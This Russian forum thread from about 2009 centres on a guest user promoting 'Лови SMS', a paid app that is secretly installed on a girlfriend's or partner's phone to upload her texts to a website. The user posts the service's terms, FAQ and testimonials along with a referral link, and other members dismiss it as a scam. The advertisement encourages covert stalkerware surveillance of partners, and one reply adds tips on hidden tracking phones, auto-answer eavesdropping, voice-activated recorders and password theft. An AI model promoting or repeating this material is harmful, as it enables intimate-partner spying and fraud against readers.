Перехватчик SMS

  • Автор темы Фокс Мaлдер
  • Дата начала
Ф

Фокс Мaлдер

Guest
ТЫНЦ!

Хочешь почитать SMSки своей подружки?
Это просто - надо только:
Зарегистрироваться на ЭТОМ сайте
Скачать программу
Установить ее на нужный телефон и ВСЕ!


"Зачем мне доступ к ее телефону?"
Если у тебя возник такой вопрос, то ты просто не знаком с тремя прописными истинами:
1. По статистике 80% женщин не удовлетворены своим партнером
2. Эту проблему женщины предпочитают обсуждать с подругами, а не с партнером
3. 80% измен можно было бы предотвратить, вовремя узнав о проблеме.

Психологи утверждают:
Человек переживает расставание легче, когда он сам узнает об измене и после этого становится инициатором расставания
Она имеет право на личную жизнь, но она не имеет права тебя обманывать!


p.s. Сразу после установки все SMS, как входящие, так и исходящие, будут доступны для просмотра в режиме ОНЛАЙН на нашем сайте, в Вашем “личном кабинете”.
 
Инженер

Инженер

Активный участник
Регистрация
01.03.2009
Сообщения
2 571
Реакции
135
Баллы
63
Что-то лохотрончиком попахивает.... Кстати сколько стоит смс с мегафона. Интересует полная стоимость со всеми налогами, кто отправлял? поделитесь опытом, работает?

А вот и сервис интересный обмена смс на веб мани....http://www.smsplata.ru/pricerur.html
Постоянная АКЦИЯ
Каждому десятому партнёру обменявшему смс на webmoney по одному из коротких номеров 4460 3649 - начисляется бонус
20 WMR

Но может я зря пугаю людей, сам не проверял утверждать не буду.Просто высказываю свои предположения.

Ха , и порадовала подпись в конце сообщения В наше время верить нельзя никому, порой даже себе.
 
АНТОНИЙ

АНТОНИЙ

Активный участник
Регистрация
21.08.2008
Сообщения
10 232
Реакции
45
Баллы
48
Инженер

Инженер

Активный участник
Регистрация
01.03.2009
Сообщения
2 571
Реакции
135
Баллы
63
Какие 30 руб, ты разве не видишь, ссылка не туда перекидавае,посмотри на какой номер, 10$ не хочешь? + налоги , Как оно тебе?, Да вроде не жалко еслиб ещё работало... Проверить никто не хочет? Да и доллар они пишут по 15 руб. а снимут по сегодняшнему курсу.
 
OP
Ф

Фокс Малдер

Guest
УСЛОВИЯ ПОЛЬЗОВАНИЯ РЕСУРСОМ "Лови SMS"
Зарегистрировавшись на сайте, Вы подтверждаете, что прочитали, поняли и согласны соблюдать настоящее пользовательское соглашение (далее - Правила).

Администрация сервиса предупреждает Вас, что, скачав программу "Лови SMS" с нашего ресурса, Вы стали полноправным владельцем официально зарегистрированного программного продукта. Использование "Лови SMS" Вами в собственных интересах в нарушение законодательства Вашей страны и настоящих Правил может быть признано правоохранительными органами Вашей страны наказуемым деянием.

Настоятельно рекомендуем Вам перед установкой и применением программы внимательно изучить настоящие правила и придерживаться их при пользовании программой "Лови SMS", а также проконсультироваться с юристом об особенностях законодательства Вашей страны.

Область применения программы "Лови SMS":

1. "Лови SMS" может быть установлен на телефон Вашего несовершеннолетнего или недееспособного ребенка, а также опекаемого Вами недееспособного лица (по решению уполномоченных государственных органов страны Вашего проживания) с целью удержания его от недобросовестных контактов, которые могут принести вред его здоровью и имуществу.
2. "Лови SMS" может быть установлен на телефоны владельцем которых являетесь Вы в целях контроля их несанкционированного использования другими лицами.
3. "Лови SMS" может быть установлен на телефоны владельцем которых является принадлежащее Вам юридическое лицо в целях контроля их несанкционированного применения корпоративными пользователями. В этом случае, пользователи служебных телефонов должны быть письменно предупреждены о недопустимости использования служебных телефонов в личных целях, а также о наличии программных средств контроля за предоставленным пользователю эфирным временем и интернет трафиком.
4. Вы как пользователь программным продуктом "Лови SMS" должны принять меры по предотвращению использования ресурсов Сети третьими лицами от Вашего имени (обеспечить сохранность ника, паролей для авторизованного доступа к интернет ресурсу "Лови SMS").

Настоящими Правилами ЗАПРЕЩАЕТСЯ:

1. Устанавливать приобретенную Вами программу "Лови SMS" на чужие телефоны без уведомления (согласия) или скрытно от его владельца.
2. Любым способом, в том числе путем взлома или хищения ника и пароля, пытаться получить доступ к чужому аккаунту интернет ресурса "Лови SMS" вопреки воле лица, которому он принадлежит.
3. Использовать в своих интересах для доступа к интернет ресурсу "Лови SMS" ставшие известными ник и пароль третьих лиц, кроме случаев, когда эти лица уполномочили Вас на такое использование.

Cтоимость отправки SMS на наш номер для активации и оплаты просмотра SMS Вы можете уточнить здесь, цены на SMS различаются в зависимости от оператора.
 
АНТОНИЙ

АНТОНИЙ

Активный участник
Регистрация
21.08.2008
Сообщения
10 232
Реакции
45
Баллы
48
мдя...хитро сделано, предлагать пользователю стоимость другого номера
 
Инженер

Инженер

Активный участник
Регистрация
01.03.2009
Сообщения
2 571
Реакции
135
Баллы
63
Ладно, с ценой разобрались, вопрос второй на каких телефонах работает, должен ли на телефоне быть подключен интернет, сколько денег будут снимать потом с симки жертвы? Т.е как отправляет копии смс на сайт?
 
OP
Ф

Фокс Малдер

Guest
Для автоматической активации аккаунта
Отправьте со своего телефона
SMS-сообщение с текстом "У каждого регистрирующегося свой текст, который система выдаёт при регистрации!"
на короткий номер 3649 или 4460



цена на SMS
 
OP
Ф

Фокс Малдер

Guest
1-на каких телефонах работает,
2-должен ли на телефоне быть подключен интернет,
3-сколько денег будут снимать потом с симки жертвы?
4-Т.е как отправляет копии смс на сайт?
1- Программа скорее всего Java, значит практически все телефоны...
2-Должен, иначе на сервер SMS не приедет....
3-По тарифу за GPRS.....
4-В виде текста....

p.s. Сам не пробывал.....
 
OP
Ф

Фокс Малдер

Guest
http://lovisms.com/faq.php
ЧАСТО ЗАДАВАЕМЫЕ ВОПРОСЫ
В. Каким образом программа понимает, что эти сообщения нужны мне, если я нигде не указал никаких данных?
О. Во время генерации программы, в разделе "Скачать", программе присваивается уникальный ID и, таким образом, СМСки, попадая в нашу базу фильтруются по пользователям, не ошибаясь в точности доставки.

В. Как установить эту программу на телефон Sony Ericsson, если у вас в списке поддерживаемых телефонов его нет?
О. Если в списке нету, то единственный вариант - это купить в нашем магазине телефон из списка и мы сами отправим его адресату с уже установленной программой. По вопросу покупки обращайтесь в службу поддержки.

В. Скажите, пожалуйста, когда будет поддержка для телефонов Sony Ericsson?
О. Телефоны SE и остальные НЕ-Смартфоны не поддерживаются. Хотя у компании есть несколько телефонов на базе UIQ и они представлены в списке, расположенном на сайте.

В. Сколько стоит дальнейшее использование программы (небольшая комиссия) и как ее оплачивать?
О. Стоимость использования программы составляет 100 рублей за сутки, причем деньги не снимаются автоматически, а Вы сами выбираете, какие дни оплачивать. Баланс можно пополнить, просто отправив SMS на короткий номер.

В. Какой приблизительный объем трафика расходуется при отправке или получении одного SMS-сообщения?
О. Размер пересылаемого пакета менее 1кб. В зависимости от оператора определяется стоимость (обычно это очень маленькая сумма).

В. Это законно?
О. Конечно… Вы же будете устанавливать программу на «свой» телефон. Вы что, не читали наши условия использования? ;-)
 
OP
Ф

Фокс Малдер

Guest
В. У моей девушки iPhone. Можно будет установить вашу программу?
О. Конечно, версия для данного аппарата доступна.

В. Как быстро я смогу читать SMSки?
О. Как только программа будет установлена на нужный телефон и будет отправлено первое SMS.

В. На какой телефон устанавливать программу? На тот, с которого надо просматривать SMS, или на свой?
О. Если Вы хотите читать на нашем сайте свои SMSки , то на свой, если же Вы хотите читать чужие, то необходимо установить программу на телефон того человека, в сообщениях которого Вы заинтересованы.

В. Что делать, если нужной модели телефона нет в списке поддерживаемых моделей?
О. Можно воспользоваться нашим магазином и купить телефон в подарок. Мы доставим покупку с уже установленной программой.

В. Подскажите, как ей пользоваться! Я не умею и у меня не получается! =((((
О. Не нужно пользоваться нашей программой, она все делает сама. Ваша главная задача - это установить ее на нужный телефон.

В. Как установить Вашу программу на телефон?
О. Инструкция по установке находится в закрытом разделе нашего сайта, который будет доступен после активации Вашего аккаунта.

В. Каким образом мне просматривать сообщения?
О. Все сообщения появляются в разделе "SMS" (доступен после входа в сайт зарегистрированных и активированных пользователей).

В. В Латвии это будет работать?
О. Наша программа будет работать в любой стране, где у оператора сотовой связи есть GPRS.

В. Почему приходят звездочки вместо SMSок?
О. Это означает, что просмотр этих сообщений не оплачен. Необходимо оплатить нужный день.

В. Подскажите пожалуйста, как удалить вашу программу с телефона?
О. Программу можно удалить через диспетчер приложений в Вашем телефоне.

В. Я установил вашу программу согласно инструкции, но я не вижу СМСок. В чем дело?
О. На телефоне должно быть настроено GPRS-соединение с Интернетом. Иначе СМСки не будут попадать к нам на сайт.
 
OP
Ф

Фокс Малдер

Guest
В. Ваша программа - очередной вирус?
О. Нет. Вирус — разновидность программы, отличительной особенностью которой является способность к размножению (саморепликация). В дополнение к этому он может повреждать или полностью уничтожать данные, подконтрольные пользователю, от имени которого была запущена зараженная программа. Наша программа ничего подобного не делает и Вы без труда сможете удалить ее с телефона.
 
OP
Ф

Фокс Малдер

Guest
ОТЗЫВЫ НАШИХ ПОЛЬЗОВАТЕЛЕЙ 12.04.2009 | gon4aruk
Все настроил, все работает. Спасибо вам большое за эту возможность. Это на самом деле Идея №1 года!

24.03.2009 | kyklovod
Я считаю нужно верить друг другу ;) но лучше проверить

23.03.2009 | friz
Нормальная тема. Я теперь девушке полностью доверяю

23.03.2009 | nata
Все очень здорово!!! Благадаря вам я многое узнала о человеке с которым прожила 10 лет... Спасибо!!!

20.03.2009 | GrWmN
Спасибо ВАМ за программу, это очень страшно, но я теперь знаю ВСЮ правду, а мой сын будет расти без отца-негодяя!!!

15.03.2009 | trattr
C одной стороны-это всё плохо,а с другой лучше знать горькую правду чем сладкую ложь!

15.03.2009 | shansonie
Надеюсь, что ваша программа поможет мне разобраться в своей личной жизни, да и вообще есть она, эта личная жизнь, или нет!

06.03.2009 | MVD27
интересная фтучка, а главное работает))))))

06.03.2009 | bg1991
Прикольная прога.. Она мне ИЗМЕНЯЕТ!!!
 
Dron671

Dron671

Новичок
Регистрация
10.08.2006
Сообщения
91
Реакции
0
Баллы
0
FOX MALDER, Не проще ли вытащить у неё телефон из сумки и почитать смс, когда она пойдёт в ванную ? или ещё куда.
P.S. Я против того что бы читать чужие смс, хотя сам это делал :(

Смс. это не самый удачный способ для шпионажа.
Если дамская сумка очень большая, то можно подкинуть туда маленький мобильник на тарифе смешарики. Тогда всегда сможешь знать где находится эта сумка. У мегафона есть функция отображения в виде ММС местоположения телефона с кусочком карты города.
+. на этот телефон можно поставить безумный звонок, и функцию авто подъёма трубки. тогда позвонив на этот мобильник всегда можно послушать обстановку вокруг.
А ещё есть всякие портативе диктофоны активируемые голосом. Корыте то же можно оставить в интересных местах.

Я уже не говорю по воровство паролей от всяких там контактов и одноклассников.
 
-=DIMON=-

-=DIMON=-

Новичок
Регистрация
26.01.2005
Сообщения
6 280
Реакции
0
Баллы
0
пройденный этап, уже переругались все . . .
 
-=DIMON=-

-=DIMON=-

Новичок
Регистрация
26.01.2005
Сообщения
6 280
Реакции
0
Баллы
0
а еще такой вопрос, как удалить эту программулину из телефона, т.к., она нигде не видна.
 
AV

AV

Новичок
Регистрация
29.10.2007
Сообщения
7 025
Реакции
181
Баллы
0
Это развод, не надо никуда ничего отправлять, смотрите на линк внимательно
http://lovisms.com/?ref=46501

при отправке смс этому 46501 пользователю идёт часть взятой от вас денежки. Тем более ставить прогу ))))))
 
Andrey_Playboy

Andrey_Playboy

Активный участник
Регистрация
01.07.2006
Сообщения
11 388
Реакции
29
Баллы
48
да реферальная ссылка))) на нас зарабатывают!!! ай ай не хорошо...
 
A

Anthrax

лорд Канцлер
Регистрация
06.11.2004
Сообщения
24 702
Реакции
100
Баллы
0
Отличный лохотрон для параноиков.
 
Den Extreme

Den Extreme

Super Moderator,
Регистрация
10.10.2004
Сообщения
71 667
Реакции
366
Баллы
83
По радио все уши пробили этой шляпой, зачем это нужно вообще:lol:
 
Верх Низ